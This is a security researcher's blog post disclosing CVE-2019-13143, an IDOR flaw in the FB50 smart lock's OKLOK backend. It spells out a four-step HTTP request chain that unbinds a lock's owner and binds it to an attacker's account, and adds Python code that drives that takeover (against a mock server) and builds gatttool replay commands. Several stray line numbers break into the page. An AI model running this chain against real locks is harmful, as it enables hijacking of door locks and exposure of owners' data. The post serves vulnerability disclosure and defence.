<!DOCTYPE html>
<html lang=en>
<link rel="stylesheet" href="/static/style.css" type="text/css">
<link rel="stylesheet" href="/static/syntax.css" type="text/css">
<link rel="shortcut icon" type="image/x-icon" href="/static/favicon.ico">
<meta name="description" content="… and lessons learnt in IoT security">
<meta name="viewport" content="initial-scale=1">
<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
<meta content="#021012" name="theme-color">
<meta name="HandheldFriendly" content="true">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:site" content="@icyphox">
<meta name="twitter:title" content="Picking the FB50 smart lock (CVE-2019-13143)">
<meta name="twitter:description" content="… and lessons learnt in IoT security">
<meta name="twitter:image" content="/static/icyphox.png">
<meta property="og:title" content="Picking the FB50 smart lock (CVE-2019-13143)">
<meta property="og:type" content="website">
<meta property="og:description" content="… and lessons learnt in IoT security">
<meta property="og:url" content="https://icyphox.sh">
<meta property="og:image" content="/static/icyphox.png">
<html>
 <title>
 Picking the FB50 smart lock (CVE-2019-13143)
 </title>
<div class="container-text">
 <header class="header">

 <a href="/">home</a>
 <a href="/blog">blog</a>
 <a href="/reading">reading</a>
 <a href="https://twitter.com/icyphox">twitter</a>
 <a href="/about">about</a>

 </header>
<body>
 <div class="content">
 <div align="left">
 <code>2019-08-05</code>
 <h1>Picking the FB50 smart lock (CVE-2019-13143)</h1>
 <h2>… and lessons learnt in IoT security</h2>
 <p>(<em>originally posted at <a href="http://blog.securelayer7.net/fb50-smart-lock-vulnerability-disclosure">SecureLayer7’s Blog</a>, with my edits</em>)</p>

<h3 id="the-lock">The lock</h3>

<p>The lock in question is the FB50 smart lock, manufactured by Shenzhen
Dragon Brother Technology Co. Ltd. It is sold under multiple brands
across many ecommerce sites, and has an estimated 15,000+ users.</p>

<p>The lock pairs to a phone via Bluetooth, and requires the OKLOK app from
the Play/App Store to function. The app requires the user to create an
account before any further functionality is available. It also handles
enrolling a fingerprint, and unlocking from a distance over Bluetooth.</p>

<p>We had two primary attack surfaces we decided to tackle — Bluetooth (BLE)
and the Android app.</p>

<h3 id="via-bluetooth-low-energy-ble">Via Bluetooth Low Energy (BLE)</h3>

<p>Android can log all Bluetooth HCI traffic to a file (the “Enable Bluetooth HCI
snoop log” toggle under Developer Options in Settings); the resulting btsnoop
log opens directly in Wireshark. With logging on, we performed around four
“unlocks” from the Android phone, as seen in the screenshot.</p>

<p><img src="/static/img/bt_wireshark.png" alt="wireshark packets" /></p>

<p>This is the value sent in the <code>Write</code> request:</p>

<p><img src="/static/img/bt_ws_value.png" alt="wireshark write req" /></p>

<p>We attempted replaying these writes using <code>gatttool</code> and <code>gattacker</code>,
but that didn’t pan out, since the value being written was encrypted and the
lock did not accept a replayed copy of it.<sup class="footnote-ref" id="fnref-1"><a href="#fn-1">1</a></sup></p>

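<p>As an added example (not code from the post or from the pwnfb50 repo), here is how one would decode the ATT Write Request PDUs that such an HCI capture shows going to the lock, and check whether the value on the unlock handle ever repeats; if it never does, a straight replay of a captured write cannot work. The PDU bytes, the handle numbers 0x0025 and 0x0028 and the MAC are constructed for illustration; the real values appear only in the screenshots above.</p>

```python
"""Added example, not code from the post or the pwnfb50 repo: decode the ATT
Write Request PDUs that an HCI snoop capture shows going to the lock, and check
whether the same value is ever written twice. The PDUs below are constructed for
illustration; the real values appear only in the post's Wireshark screenshot."""
import struct
from collections import defaultdict
from typing import Dict, List, Tuple

ATT_WRITE_REQ = 0x12  # ATT Write Request opcode; layout is opcode, LE16 handle, value


def parse_att_write(pdu: bytes) -> Tuple[int, bytes]:
    """Split a Write Request PDU into (attribute handle, value written)."""
    if len(pdu) < 3 or pdu[0] != ATT_WRITE_REQ:
        raise ValueError("not an ATT Write Request PDU")
    (handle,) = struct.unpack_from("<H", pdu, 1)
    return handle, bytes(pdu[3:])


def writes_by_handle(pdus: List[bytes]) -> Dict[int, List[bytes]]:
    """Group the written values by the handle they went to."""
    grouped: Dict[int, List[bytes]] = defaultdict(list)
    for pdu in pdus:
        handle, value = parse_att_write(pdu)
        grouped[handle].append(value)
    return dict(grouped)


def replayable_handles(pdus: List[bytes]) -> List[int]:
    """Handles on which an identical value was written more than once. If the unlock
    handle is absent from this list, every unlock carried a different blob, so
    re-sending a captured write (as with gatttool) cannot succeed by itself."""
    return sorted(h for h, vals in writes_by_handle(pdus).items()
                  if len(set(vals)) < len(vals))


def gatttool_replay_cmd(mac: str, handle: int, value: bytes) -> str:
    """The BlueZ gatttool invocation that would replay one captured write."""
    return f"gatttool -b {mac} --char-write-req -a 0x{handle:04x} -n {value.hex()}"


def constructed_capture() -> List[bytes]:
    """Constructed stand-in for four unlocks: four distinct 16-byte blobs to the
    (assumed) unlock characteristic at handle 0x0025, plus a fixed configuration
    write to handle 0x0028 that shows up unchanged each time."""
    unlock_blobs = [
        "a3f1c27e91b04d5ee6f830c1d27a9b4c",
        "7c0e9ad2f4b16e83a9c5d2f0e1b34a77",
        "e58b2c4d7a90f13b6d2ec8a45f9071be",
        "0f6d3a9bc2e17584d9a0b3c6e2f14d58",
    ]
    pdus = []
    for blob in unlock_blobs:
        pdus.append(bytes([ATT_WRITE_REQ]) + struct.pack("<H", 0x0025) + bytes.fromhex(blob))
        pdus.append(bytes([ATT_WRITE_REQ]) + struct.pack("<H", 0x0028) + b"\x01")
    return pdus


if __name__ == "__main__":
    cap = constructed_capture()
    print("handles with repeated writes:", [hex(h) for h in replayable_handles(cap)])
    handle, value = parse_att_write(cap[0])
    print(gatttool_replay_cmd("XX:XX:XX:XX:XX:XX", handle, value))
```

<p>On the constructed capture only the configuration handle 0x0028 comes back as replayable; the four unlock writes to 0x0025 are all distinct, which is exactly the situation in which a gatttool replay fails and you have to either break the encryption (as in footnote 1) or, as we did, go after the backend instead.</p>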
<h3 id="via-the-android-app">Via the Android app</h3>

<p>Reversing the app using <code>jd-gui</code>, <code>apktool</code> and <code>dex2jar</code> didn’t get us too
far, since most of it was obfuscated. Why bother, when there exists an
easier approach: proxying the app’s HTTP traffic through Burp Suite.</p>

<p>We captured and played around with a bunch of requests and responses,
and finally arrived at a working exploit chain.</p>

<h3 id="the-exploit">The exploit</h3>

<p>The entire exploit is a 4-step process consisting of authenticated
HTTP requests. “Authenticated” here means only that the attacker is logged in
to an OKLOK account of their own; none of the endpoints checks that the caller
actually owns the lock being queried, unbound or bound:</p>

<ol>
<li>Using the lock’s MAC (obtained via a simple Bluetooth scan in the
vicinity), get the barcode and lock ID</li>
<li>Using the barcode, fetch the owner’s user ID</li>
<li>Using the lock ID and user ID, unbind the owner from the lock</li>
<li>Provide a new name, the attacker’s user ID and the MAC to bind the attacker
to the lock</li>
</ol>

<p>This is what it looks like, in essence (personal info redacted).</p>

<h4 id="request-1">Request 1</h4>

<pre><code>POST /oklock/lock/queryDevice
{"mac":"XX:XX:XX:XX:XX:XX"}
</code></pre>

<p>Response:</p>

<pre><code>{
 "result":{
 "alarm":0,
 "barcode":"<BARCODE>",
 "chipType":"1",
 "createAt":"2019-05-14 09:32:23.0",
 "deviceId":"",
 "electricity":"95",
 "firmwareVersion":"2.3",
 "gsmVersion":"",
 "id":<LOCK ID>,
 "isLock":0,
 "lockKey":"69,59,58,0,26,6,67,90,73,46,20,84,31,82,42,95",
 "lockPwd":"000000",
 "mac":"XX:XX:XX:XX:XX:XX",
 "name":"lock",
 "radioName":"BlueFPL",
 "type":0
 },
 "status":"2000"
}
</code></pre>

<h4 id="request-2">Request 2</h4>

<pre><code>POST /oklock/lock/getDeviceInfo

{"barcode":"https://app.oklok.com.cn/app.html?id=<BARCODE>"}
</code></pre>

<p>Response:</p>

<pre><code>{
 "result":{
 "account":"email@some.website",
 "alarm":0,
 "barcode":"<BARCODE>",
 "chipType":"1",
 "createAt":"2019-05-14 09:32:23.0",
 "deviceId":"",
 "electricity":"95",
 "firmwareVersion":"2.3",
 "gsmVersion":"",
 "id":<LOCK ID>,
 "isLock":0,
 "lockKey":"69,59,58,0,26,6,67,90,73,46,20,84,31,82,42,95",
 "lockPwd":"000000",
 "mac":"XX:XX:XX:XX:XX:XX",
 "name":"lock",
 "radioName":"BlueFPL",
 "type":0,
 "userId":<USER ID>
 }
}
</code></pre>

<h4 id="request-3">Request 3</h4>

<pre><code>POST /oklock/lock/unbind

{"lockId":"<LOCK ID>","userId":<USER ID>}
</code></pre>

<h4 id="request-4">Request 4</h4>

<pre><code>POST /oklock/lock/bind

{"name":"newname","userId":<USER ID>,"mac":"XX:XX:XX:XX:XX:XX"}
</code></pre>
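<p>The four requests above, chained end to end, as an added example that is neither the post’s own exploit code nor the OKLOK app’s. Because it has to run offline, the chain is driven against a constructed in-memory stand-in for the backend, and that stand-in is written twice over: with <code>enforce_ownership=False</code> it reproduces the reported behaviour (any logged-in user can query, unbind and bind any lock), and with <code>enforce_ownership=True</code> it adds the check that was missing. Only the <code>/oklock/lock/*</code> paths and the <code>"2000"</code> success status are taken from the post; the session tokens, user IDs, e-mail addresses, the other status codes and the bind/unbind response bodies are assumptions made here.</p>

```python
"""Added example, not code from the post or the pwnfb50 repo: the four-step takeover
chain, run against a constructed in-memory stand-in for the OKLOK backend so it works
offline, with an ownership check beside it that would have stopped the chain. Only the
/oklock/lock/* paths and the "2000" success status come from the post; the session
tokens, user IDs, e-mails, other status codes and bind/unbind bodies are assumptions."""
from dataclasses import dataclass, field
from typing import Callable, Dict, Optional

OK = "2000"      # success status shown in the post's responses
DENIED = "4030"  # constructed: what a hardened backend might return


@dataclass
class Lock:
    lock_id: int
    mac: str
    barcode: str
    owner_id: Optional[int]
    name: str = "lock"


@dataclass
class FakeOklokServer:
    """enforce_ownership=False reproduces the reported bug: the backend checks that
    the caller is logged in but never that the caller owns the lock in question."""
    enforce_ownership: bool = False
    tokens: Dict[str, int] = field(default_factory=dict)    # session token -> user id
    accounts: Dict[int, str] = field(default_factory=dict)  # user id -> e-mail
    locks: Dict[int, Lock] = field(default_factory=dict)

    def _by(self, attr: str, value: str) -> Optional[Lock]:
        return next((lk for lk in self.locks.values() if getattr(lk, attr) == value), None)

    def post(self, path: str, body: dict, token: str) -> dict:
        caller = self.tokens.get(token)
        if caller is None:
            return {"status": "4010"}  # constructed: not logged in at all
        if path == "/oklock/lock/queryDevice":
            lock = self._by("mac", body["mac"])
            if lock is None:
                return {"status": "4040"}
            # the real response also carried lockKey and lockPwd (see the post)
            return {"status": OK, "result": {"id": lock.lock_id, "barcode": lock.barcode}}
        if path == "/oklock/lock/getDeviceInfo":
            lock = self._by("barcode", body["barcode"].rsplit("id=", 1)[-1])
            if lock is None:
                return {"status": "4040"}
            result = {"id": lock.lock_id, "mac": lock.mac}
            # IDOR: the vulnerable backend tells any user who owns any lock
            if not self.enforce_ownership or lock.owner_id == caller:
                result.update(userId=lock.owner_id, account=self.accounts.get(lock.owner_id))
            return {"status": OK, "result": result}
        if path == "/oklock/lock/unbind":
            lock = self.locks.get(int(body["lockId"]))
            if lock is None:
                return {"status": "4040"}
            if self.enforce_ownership and lock.owner_id != caller:
                return {"status": DENIED}  # only the current owner may unbind
            lock.owner_id = None
            return {"status": OK}
        if path == "/oklock/lock/bind":
            lock = self._by("mac", body["mac"])
            if lock is None:
                return {"status": "4040"}
            if self.enforce_ownership and (lock.owner_id is not None or body["userId"] != caller):
                return {"status": DENIED}  # only an unowned lock, and only to yourself
            lock.owner_id, lock.name = body["userId"], body["name"]
            return {"status": OK}
        return {"status": "4040"}


def take_over(post: Callable[[str, dict], dict], mac: str, attacker_id: int) -> dict:
    """Steps 1-4 from the post. `post(path, body)` is any JSON transport that already
    carries the attacker's own session; here it is bound to the fake server."""
    dev = post("/oklock/lock/queryDevice", {"mac": mac})["result"]            # 1
    barcode_url = f"https://app.oklok.com.cn/app.html?id={dev['barcode']}"
    info = post("/oklock/lock/getDeviceInfo", {"barcode": barcode_url})["result"]  # 2
    victim = info.get("userId")
    if victim is None:  # hardened backend: owner not disclosed, chain stops here
        return {"lock_id": dev["id"], "victim_id": None, "bound": False}
    unbound = post("/oklock/lock/unbind", {"lockId": str(dev["id"]), "userId": victim})    # 3
    bound = post("/oklock/lock/bind", {"name": "newname", "userId": attacker_id, "mac": mac})  # 4
    return {"lock_id": dev["id"], "victim_id": victim, "victim_account": info.get("account"),
            "bound": unbound["status"] == OK and bound["status"] == OK}


def demo(enforce_ownership: bool) -> dict:
    """Constructed scenario: user 1001 owns lock 42; the attacker (user 2002) has only
    a free account and the MAC picked up from a BLE scan."""
    srv = FakeOklokServer(enforce_ownership=enforce_ownership,
                          tokens={"victim-token": 1001, "attacker-token": 2002},
                          accounts={1001: "victim@example.com", 2002: "attacker@example.com"},
                          locks={42: Lock(42, "AA:BB:CC:DD:EE:FF", "BARCODE42", 1001)})
    result = take_over(lambda p, b: srv.post(p, b, "attacker-token"), "AA:BB:CC:DD:EE:FF", 2002)
    result["owner_after"] = srv.locks[42].owner_id
    return result
```

<p><code>demo(False)</code> ends with the attacker as owner of lock 42 and the victim’s e-mail in hand; <code>demo(True)</code> stops at step 2 because the hardened backend refuses to tell a non-owner who owns the lock, and even a caller who already knew the victim’s user ID gets <code>DENIED</code> on the unbind. The point of the second mode is that the fix is one ownership comparison per endpoint, which is what was missing in the real service.</p>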
173
174<h3 id="thats-it-the-scary-stuff">That’s it! (& the scary stuff)</h3>
175
176<p>You should have the lock transferred to your account. The severity of this
177issue lies in the fact that the original owner completely loses access to
178their lock. They can’t even “rebind” to get it back, since the current owner
179(the attacker) needs to authorize that. </p>
180
181<p>To add to that, roughly 15,000 user accounts’ info are exposed via IDOR.
182Ilja, a cool dude I met on Telegram, noticed locks named “carlock”,
183“garage”, “MainDoor”, etc.<sup class="footnote-ref" id="fnref-2"><a href="#fn-2">2</a></sup> This is terrifying.</p>
184
185<p><em>shudders</em></p>
186
<h3 id="proof-of-concept">Proof of Concept</h3>

<p><a href="https://twitter.com/icyphox/status/1158396372778807296">PoC Video</a></p>

<p><a href="https://github.com/icyphox/pwnfb50">Exploit code</a></p>

<h3 id="disclosure-timeline">Disclosure timeline</h3>

<ul>
<li><strong>26th June, 2019</strong>: Issue discovered at SecureLayer7, Pune</li>
<li><strong>27th June, 2019</strong>: Vendor notified about the issue</li>
<li><strong>2nd July, 2019</strong>: CVE-2019-13143 reserved</li>
<li>No response from vendor</li>
<li><strong>2nd August, 2019</strong>: Public disclosure</li>
</ul>

<h3 id="lessons-learnt">Lessons learnt</h3>

<p><strong>DO NOT</strong>. Ever. Buy. A smart lock. You’re better off with the “dumb” ones
with keys. With the IoT plague spreading, it brings a large attack surface
to things that were otherwise “unhackable” (try hacking a “dumb” toaster).</p>

<p>The IoT security scene is rife with bug classes from over 10 years ago, like
executable stack segments<sup class="footnote-ref" id="fnref-3"><a href="#fn-3">3</a></sup>, hardcoded keys, and poor development
practices in general.</p>

<p>Our existing threat models and scenarios have to be updated to factor
in these new exploitation possibilities. This also broadens the playing
field for cyber warfare and mass surveillance campaigns.</p>

<h3 id="researcher-info">Researcher info</h3>

<p>This research was done at <a href="https://securelayer7.net">SecureLayer7</a>, Pune, IN by:</p>

<ul>
<li>Anirudh Oppiliappan (me)</li>
<li>S. Raghav Pillai (<a href="https://twitter.com/_vologue">@_vologue</a>)</li>
<li>Shubham Chougule (<a href="https://twitter.com/shubhamtc">@shubhamtc</a>)</li>
</ul>

<div class="footnotes">
<hr />
<ol>
<li id="fn-1">
<p><a href="https://www.pentestpartners.com/security-blog/pwning-the-nokelock-api/">This</a> article discusses a similar smart lock, but in that case the authors did break the encryption. <a href="#fnref-1" class="footnoteBackLink" title="Jump back to footnote 1 in the text.">↩</a></p>
</li>

<li id="fn-2">
<p>Thanks to Ilja Shaposhnikov (@drakylar). <a href="#fnref-2" class="footnoteBackLink" title="Jump back to footnote 2 in the text.">↩</a></p>
</li>

<li id="fn-3">
<p><a href="https://gsec.hitb.org/materials/sg2015/whitepapers/Lyon%20Yang%20-%20Advanced%20SOHO%20Router%20Exploitation.pdf">PDF</a> <a href="#fnref-3" class="footnoteBackLink" title="Jump back to footnote 3 in the text.">↩</a></p>
</li>
</ol>
</div>

 </div>
 <hr />
 <p class="muted">Questions or comments? Open an issue at <a href="https://github.com/icyphox/site">this repo</a>, or send a plain-text email to <a href="mailto:x@icyphox.sh">x@icyphox.sh</a>.</p>
 <footer>
 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/">
 <img src="https://licensebuttons.net/l/by-nc-sa/4.0/80x15.png">
 </a>
 </footer>
 </body>
 </div>
 </html>